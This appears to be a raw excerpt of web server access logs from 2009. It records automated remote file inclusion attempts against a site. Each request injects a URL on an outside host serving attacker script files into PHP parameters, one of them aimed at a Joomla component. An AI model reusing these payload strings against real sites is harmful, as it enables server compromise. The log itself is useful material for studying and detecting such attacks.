93.174.0.38 - - [14/Dec/2009:08:26:05 -0800] "GET /logs/access_080716.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.254.168.42 - - [14/Dec/2009:08:26:18 -0800] "GET /logs/access_090213.log////?_index.php[DOCUMENT_ROOT]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.168.42 - - [14/Dec/2009:08:26:19 -0800] "GET ///?_index.php[DOCUMENT_ROOT]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 200 14814 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.168.42 - - [14/Dec/2009:08:26:21 -0800] "GET /logs////?_index.php[DOCUMENT_ROOT]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 200 130225 "-" "libwww-perl/5.805" "www.dmulk.com"
